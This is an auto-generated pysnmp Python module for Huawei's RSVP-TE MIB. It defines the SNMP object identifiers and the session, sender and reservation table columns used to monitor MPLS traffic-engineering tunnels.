# PySNMP MIB module HUAWEI-RSVPTE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HUAWEI-RSVPTE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:36:34 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
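# Note: pysmi-generated modules such as this one are not importable on their
# own; pysnmp's MibBuilder executes them in a namespace that already provides
# `mibBuilder`, which is why it is used below without an explicit import.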
ObjectIdentifier, OctetString, Integer = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "OctetString", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ConstraintsIntersection, SingleValueConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ConstraintsIntersection", "SingleValueConstraint", "ValueSizeConstraint", "ConstraintsUnion")
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
ifIndex, = mibBuilder.importSymbols("IF-MIB", "ifIndex")
BitRate, MessageSize, QosService, BurstSize, SessionType = mibBuilder.importSymbols("INTEGRATED-SERVICES-MIB", "BitRate", "MessageSize", "QosService", "BurstSize", "SessionType")
ModuleCompliance, ObjectGroup, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "ObjectGroup", "NotificationGroup")
Integer32, Unsigned32, MibIdentifier, Counter64, Counter32, TimeTicks, IpAddress, ModuleIdentity, iso, Gauge32, MibScalar, MibTable, MibTableRow, MibTableColumn, ObjectIdentity, NotificationType, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "Integer32", "Unsigned32", "MibIdentifier", "Counter64", "Counter32", "TimeTicks", "IpAddress", "ModuleIdentity", "iso", "Gauge32", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "ObjectIdentity", "NotificationType", "Bits")
DisplayString, TruthValue, TimeStamp, TimeInterval, TextualConvention, RowStatus = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TruthValue", "TimeStamp", "TimeInterval", "TextualConvention", "RowStatus")
hwRsvpTe = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148))
hwRsvpTe.setRevisions(('2014-10-25 17:36', '2014-06-16 14:55', '2013-08-28 17:55',))
if mibBuilder.loadTexts: hwRsvpTe.setLastUpdated('201410251736Z')
if mibBuilder.loadTexts: hwRsvpTe.setOrganization('Huawei Technologies Co.,Ltd.')
hwRsvpTeObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1))
hwRsvpTeSessionTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1), )
if mibBuilder.loadTexts: hwRsvpTeSessionTable.setStatus('current')
hwRsvpTeSessionEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"))
if mibBuilder.loadTexts: hwRsvpTeSessionEntry.setStatus('current')
hwRsvpTeSessionNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSessionNumber.setStatus('current')
hwRsvpTeSessionType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionType.setStatus('current')
hwRsvpTeSessionDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddr.setStatus('current')
hwRsvpTeSessionDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionDestAddrLength.setStatus('current')
hwRsvpTeSessionSenders = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionSenders.setStatus('current')
hwRsvpTeSessionReceivers = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionReceivers.setStatus('current')
hwRsvpTeSessionRequests = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionRequests.setStatus('current')
hwRsvpTeSessionTunnelId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelId.setStatus('current')
hwRsvpTeSessionTunnelExtId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 9), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionTunnelExtId.setStatus('current')
hwRsvpTeSessionLspsNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionLspsNumber.setStatus('current')
hwRsvpTeSessionStyle = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(10, 17, 18))).clone(namedValues=NamedValues(("ff", 10), ("wf", 17), ("se", 18)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSessionStyle.setStatus('current')
hwRsvpTeSenderTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2), )
if mibBuilder.loadTexts: hwRsvpTeSenderTable.setStatus('current')
hwRsvpTeSenderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSenderNumber"))
if mibBuilder.loadTexts: hwRsvpTeSenderEntry.setStatus('current')
hwRsvpTeSenderNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeSenderNumber.setStatus('current')
hwRsvpTeSenderType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderType.setStatus('current')
hwRsvpTeSenderDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddr.setStatus('current')
hwRsvpTeSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddr.setStatus('current')
hwRsvpTeSenderDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDestAddrLength.setStatus('current')
hwRsvpTeSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAddrLength.setStatus('current')
hwRsvpTeSenderHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopAddr.setStatus('current')
hwRsvpTeSenderHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderHopLih.setStatus('current')
hwRsvpTeSenderInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterface.setStatus('current')
hwRsvpTeSenderTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 10), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecRate.setStatus('current')
hwRsvpTeSenderTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecPeakRate.setStatus('current')
hwRsvpTeSenderTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 12), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecBurst.setStatus('current')
hwRsvpTeSenderTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 13), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMinTu.setStatus('current')
hwRsvpTeSenderTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTSpecMaxTu.setStatus('current')
hwRsvpTeSenderInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderInterval.setStatus('current')
hwRsvpTeSenderRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 16), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderRsvpHop.setStatus('current')
hwRsvpTeSenderPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 17), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65532))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderPolicy.setStatus('current')
hwRsvpTeSenderAdspecBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecBreak.setStatus('current')
hwRsvpTeSenderAdspecHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 19), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecHopCount.setStatus('current')
hwRsvpTeSenderAdspecPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 20), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecPathBw.setStatus('current')
hwRsvpTeSenderAdspecMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 21), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMinLatency.setStatus('current')
hwRsvpTeSenderAdspecMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 22), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecMtu.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 23), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedSvc.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 24), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedBreak.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 25), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDtot = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 26), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDtot.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedCsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 27), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedCsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedDsum = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 28), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedDsum.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 29), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedHopCount.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 30), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedPathBw.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 31), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMinLatency.setStatus('current')
hwRsvpTeSenderAdspecGuaranteedMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 32), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecGuaranteedMtu.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 33), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadSvc.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadBreak = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 34), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadBreak.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadHopCount = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 35), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadHopCount.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadPathBw = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 36), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadPathBw.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMinLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 37), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMinLatency.setStatus('current')
hwRsvpTeSenderAdspecCtrlLoadMtu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 38), Integer32()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderAdspecCtrlLoadMtu.setStatus('current')
hwRsvpTeSenderTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 39), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderTtl.setStatus('current')
hwRsvpTeLspId = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 40), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeLspId.setStatus('current')
hwRsvpTeSenderMsgIdSndFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 41), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndFlag.setStatus('current')
hwRsvpTeSenderMsgIdSndEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 42), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndEpoch.setStatus('current')
hwRsvpTeSenderMsgIdSndNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 43), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndNumber.setStatus('current')
hwRsvpTeSenderMsgIdRcvFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 44), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvFlag.setStatus('current')
hwRsvpTeSenderMsgIdRcvEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 45), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvEpoch.setStatus('current')
hwRsvpTeSenderMsgIdRcvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 46), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvNumber.setStatus('current')
hwRsvpTeSenderClassType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 47), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderClassType.setStatus('current')
hwRsvpTeSenderLabelRequestCtype = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("withoutLabelRange", 1), ("withAtmLabelRange", 2), ("withFrameRelayLabelRange", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestCtype.setStatus('current')
hwRsvpTeSenderLabelRequestL3pid = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 49), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestL3pid.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 50), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 51), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVci.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 52), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 53), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMinDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 54), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMinDlci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMaxDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 55), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMaxDlci.setStatus('current')
hwRsvpTeSenderSessionAttrType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 7))).clone(namedValues=NamedValues(("withRa", 1), ("withoutRa", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrType.setStatus('current')
hwRsvpTeSenderSessionAttrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 57), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrSetupPrio.setStatus('current')
hwRsvpTeSenderSessionAttrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 58), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrHoldPrio.setStatus('current')
hwRsvpTeSenderSessionAttrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 59), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrFlag.setStatus('current')
hwRsvpTeSenderSessionAttrName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 60), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrName.setStatus('current')
hwRsvpTeSenderSessionAttrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 61), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrExcludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 62), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 63), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 64), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrSetupPrio.setStatus('current')
hwRsvpTeSenderFrrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 65), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHoldPrio.setStatus('current')
hwRsvpTeSenderFrrHopLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 66), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHopLimit.setStatus('current')
hwRsvpTeSenderFrrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 67), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("oneToOneDesired", 1), ("facilityDesired", 2), ("noBackupDesired", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrFlag.setStatus('current')
hwRsvpTeSenderFrrBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 68), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrBandwidth.setStatus('current')
hwRsvpTeSenderFrrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 69), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrExcludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 70), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 71), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrInuseFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 72), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normal", 1), ("plrInUse", 2), ("mpInUse", 3), ("plrAndMpInUse", 4), ("underProtection", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrInuseFlag.setStatus('current')
hwRsvpTeSenderDiffServPsc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 73), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDiffServPsc.setStatus('current')
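# hwRsvpTeResvTable: reservation (RESV) state received from downstream,
# one row per (hwRsvpTeSessionNumber, hwRsvpTeResvNumber) pair.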
hwRsvpTeResvTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3), )
if mibBuilder.loadTexts: hwRsvpTeResvTable.setStatus('current')
hwRsvpTeResvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvEntry.setStatus('current')
hwRsvpTeResvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvNumber.setStatus('current')
hwRsvpTeResvType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvType.setStatus('current')
hwRsvpTeResvDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddr.setStatus('current')
hwRsvpTeResvSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddr.setStatus('current')
hwRsvpTeResvDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddrLength.setStatus('current')
hwRsvpTeResvSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddrLength.setStatus('current')
